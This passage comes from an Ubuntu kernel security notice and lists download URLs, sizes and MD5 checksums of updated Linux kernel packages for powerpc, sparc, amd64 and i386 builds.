http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   168088 03cd1ec2802eff9dc9a4913d8c722a11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    42314 aeac632e9b6a085751f5919290248f74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    44920 c4f46e3b3fabfcc811a0b3cb2474fdd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   320330 d57498dcb918956e5e02aff09d1ab5d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   324874 84c5cf72bb1f920da379ffffd4a75fbf\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:    50472 5c9065af16c456abdaddae51194acfdd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:     2358 e37e812551c0483ac3e0905b5e10f092\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:    40380 8e3af9c5794c3b2ebffe67126f47bf3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:   110552 3c8e232a43ce86acca5815ece9ba854c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:    41218 7bb313ecd2c6a07c1c089ab2ec93f7ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:   104222 1ab67ef824bc04cd507f3f88c4cd987a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:     7434 09b93698d62051a4baf92719bd21b14a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:   149314 ef116d9d09d29f93ae4a58f461410647\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:  1712882 3b4328554eb324571ab7682ee4e8a3a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.83_sparc.deb\n      Size/MD5:   771506 7caea4933e34a2b502c7668df1a6ab90\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.83_sparc.deb\n      Size/MD5:   771132 c1a93f67aaecfc83300b9bd3a4976c68\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_sparc.deb\n      Size/MD5:  6962430 a98225cb46e3fd78ff9a513e4e910bb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.83_sparc.deb\n      Size/MD5: 15016514 f8d4f0805fa68d04c7ff6e90f99f2d1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.83_sparc.deb\n      Size/MD5: 14832282 f1a4ceb954bfbed56b5074eea6ffc85a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:     7436 78f2a319a7d6c11563d9df2373fceab3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:   248766 4b3997d9492a7e901ab9e1ce32a11fbe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:   212564 b25a8203a7c2dc83c32f22044d7395bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:  1048442 fc26842536f9d7154244c491a98b9e87\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:  1482446 26dc79d91f304ac9e2b0a9b2a132f864\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:    10116 cd9625e8a2e645a36f7b75dd50a02413\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:    40180 b9c370ffcf5294455f959d9f5dfd7cce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:     9366 f16d374ff864ab6a32598a93664fecaa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:    61402 fa4b14306dbad45fe771b77d4449ef2c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:   163274 25232cd92ef5d9e81fdf488634f4b295\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:    64088 d8497fffa49122764a4fc3055e7916ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:  1235400 2d0d95dafaf1d7cb6aba59cfc8323e5a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:    59310 40bdbc31eb9bfcf8415fc687cd17cdbc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:    37426 9e6597125c50de3e79c60a7115e1823e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb\n      Size/MD5:   280134 d69c0b6d976e188dc71fb2d08b8c5071\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.68.diff.gz\n      Size/MD5:  4805685 a1396c17a8f400420f78006b3490b006\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.68.dsc\n      Size/MD5:     2258 bdd18494b15590678ab6757866384faf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz\n      Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.68_all.deb\n      Size/MD5:  4931804 4b94ee9aa9dd401f43c6c5dd0af5d312\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.68_all.deb\n      Size/MD5:  8147526 36fbcde7f290ce7d36c5a86ec86d8fef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.68_all.deb\n      Size/MD5:   100082 825d07271f1e07aa87619758abfeaa93\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.68_all.deb\n      Size/MD5: 46973018 43f133f61f904ba4d10c7df484dae5eb\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    28610 d221605c4d4de8fd4d9f23c1bf955d39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   224190 47789cbb5358f615ba9aad9617bc1b40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    52650 962e907eb399b9b517277fbbdf9edc29\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    40646 d107bbf9a85ff4c2703160f26eb9a021\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    48650 c2247284c6a0eade9e0263dbc8b61b62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    86330 7cb7a6873e6a20e258fedca59975821c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    36316 3a69ca20df1679f978bd0baf3c72251a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   648772 43743152dca42cd7443c3caf0287bd99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   209950 67129e31a185778a221a70391a38fa15\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    39192 ad2ac2a7fd96d5a7449f80f515b3aa9b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    67990 01a6b245bf50638a3a737c9032988668\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   145446 e1ab07b47571268c51d606c4449d9ab4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   287272 c6fec5eba4264266f770e6113a19a2d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:  2130720 ea730aab7b7d7a8486f047002a9da359\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.68_amd64.deb\n      Size/MD5:   674786 2f243062075cfdaee443ecfb9b78ec80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.68_amd64.deb\n      Size/MD5:  1253848 81afd81221fa56f9b2f9eceaf66e159f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.68_amd64.deb\n      Size/MD5:  1275698 e53286246e82b2f1a3e5b6d1ecc1b8db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.68_amd64.deb\n      Size/MD5:   674962 f548fd2121a3d56e18c2d75363cdf156\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.68_amd64.deb\n      Size/MD5:  1085708 1dfc4b3475d8d5e72cab75fbea6ae503\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.68_amd64.deb\n      Size/MD5: 17809528 759c656058751ad36cc6a8b64a0b402d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.68_amd64.deb\n      Size/MD5: 17782706 d90be8c9f58ca9fdbc4785e4f96104e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.68_amd64.deb\n      Size/MD5: 21057826 b880205379c7186e27eb85841ab29266\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.68_amd64.deb\n      Size/MD5: 21433636 564a0f9386bbc5161c4b02a0f9a0ce14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_amd64.deb\n      Size/MD5:   708238 586f0a220cb3de5be70aa2bd976b35fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   263664 edd5c15c65863f831c7bf063ed4c78e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   176420 8e4e4fda2b2ac38909948ba2e2c441ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   254118 4f8c8dbe4767a22bff88824f884284f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:  1641146 7e64045e85894696a193e1525005089c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   143720 aad29b2008b96c933acc347cc2484974\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   164470 dd788bad411f04d0d23eb732edd368c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   115860 5e75c93921ab740cbd72f44d13d71cab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    35056 92d739d7e961d1c561f3d211e7543707\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    64404 b970ba774b7bf10fc931a65da31beb89\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    69712 b110c422479e541fb5d42d66974f8824\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    21598 cf69df47e7d957edd8e1748c1fee081f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:     8620 49f7c102dfb907be4af83c5c042ce402\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    57230 5c6560857419594a92e41568beeed6f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   103042 1e80b33446b03fd2163fe137d290e477\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:  1212574 10793b3c5b1152913467116b35cd8d78\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    45492 a13c87491d1c5d4a88c85077f9293335\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    12776 f785f496dc20c7fc474b05d00dee4565\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:   498968 2af8782dfac6870326396f14151ee48e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb\n      Size/MD5:    75054 916713c3d0e5fb5f862e4d111c9e5159\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.68_amd64.deb\n      Size/MD5: 19261560 f263d75824550b6741f2a824f15ca788\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.68_amd64.deb\n      Size/MD5: 17914938 14cf693883a1bbfb865ee6f9fc17b6da\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.68_amd64.deb\n      Size/MD5: 18915966 0b442706ac908da36518814216f962ff\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    23696 329de678a31d3d386dc5d37cef0457b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    26798 b032666b823fed05400463841ebaa210\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   218808 e90e51118dd5104662a091b65220b297\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   220480 a365b410311a1888e1d98c856a91dab3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    51926 025795743665eb402bc234555c6b39e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    52066 e31ea61183783cf6613e25628beed063\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    38322 6f67b8ba8248e0583f4793eac9370ec3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    39074 97bbbba051b764e683b7731bbf4c21c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    45992 237db20c6a4b37bf8daa23c210d289a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    46168 b3a0e41bd46c1972f5fc0b93bb635847\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    83250 48e9848e5a1fbad96ed520b0d45bb1c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    83656 7c36457138892caa165707c6194499eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    32392 6515754e92d16cd83dc4de73e5070629\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    32670 54135044da2e8cc753887f230fbbc3c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   637744 ce993f7f0caea7d6ee17f458366b05b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   655908 89b222b67d295a466b8be36a30273c98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   209854 5c102e8ac383a9c3a237dc22adcb355d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   213610 d72153cf8c10f2368b827e86c9ba1c29\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    46562 4ba2f6975424f4815a0a50f2de7e7f67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    47604 4d471e236046ad59e0cda27f760d703b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    62272 570a7795e145cd484abc520448352590\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    63632 09b4ee0122665857d918e7381042a055\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   130544 7e832ae2f446f43b42217bf0ad46f088\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   137028 e98d42f6964ddc1bbe641879b5139614\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   279076 b3e2340e032340e1e875131de541ec25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   277686 d3b7c9e6a0face374f12dd77d3835e18\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:  2012902 541fb03ff6a72f3d3854037fcda9d744\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:  2089036 6ce3fe1b19c19d54675c9ec12c792775\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.68_i386.deb\n      Size/MD5:   656024 596d1a15554f7778c4288b04b8fc802c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.68_i386.deb\n      Size/MD5:   658656 193f1939073ad97fe3fa704791e88de9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.68_i386.deb\n      Size/MD5:  1244894 5efcdeb0ece441cbdbae8ebe3dd6021e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.68_i386.deb\n      Size/MD5:  1263366 de1454c802b2fd30b743e42d28d3bb6c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.68_i386.deb\n      Size/MD5:   660432 ec584391487d7d947f108f5422efb0f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.68_i386.deb\n      Size/MD5:   562622 e6161052828c558c1b9a50a00f58913e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.68_i386.deb\n      Size/MD5:  1060278 34db9506f97f5cbbb4f6727efbbc247f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.68_i386.deb\n      Size/MD5: 18386442 57542c984a13b64049a329f8ea1e5e18\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.68_i386.deb\n      Size/MD5: 18401904 f3383611cacb0e44484689eb4e8d31f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.68_i386.deb\n      Size/MD5: 18514810 6b382004498cd95a9c4b96cfc2bcead3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.68_i386.deb\n      Size/MD5:  8733442 5291c5342dfa92ce21ba6f0e5d66a88e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.68_i386.deb\n      Size/MD5: 25545652 9e1adbc41aadc37b4d4dfae06db05628\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.68_i386.deb\n      Size/MD5: 26359094 5c17d02a32605554a4d866e6441f7585\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.68_i386.deb\n      Size/MD5: 27383080 7293c6615b1c0d7426e2d1025f325b53\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.68_i386.deb\n      Size/MD5: 24878278 29ba5c38edea2be1f6314f7313747112\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_i386.deb\n      Size/MD5:   708220 31f3da7eabcd06ec0849399df4f27575\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   258826 2ed2209e04268dd25263895cb88f9a12\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   264150 214cceae24e859b36e3c36463aeb25b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   163266 2036485b44265afd417d510c240be06b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   163024 eabc8daf7d8bc770fc398eff9ba0e93b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   236718 7a0d01c4124bb1317cd6992182117b6b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   244982 d12427575d3702e14b08ea3988f52af4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:  1810028 94150212b443ae1225c31c80a1cb8770\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:  1827240 14129d49a8642945705ff002598f9057\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   150838 cf4e6bcf3b84af3f094fb5cb816b8161\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   143020 2f12b04ccca3ebe26c43a576f5e03cf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   156078 80863f3d547a79ef882a54eb20c41b40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   157148 d0f88b5521269cad550349374d4a2c26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   107220 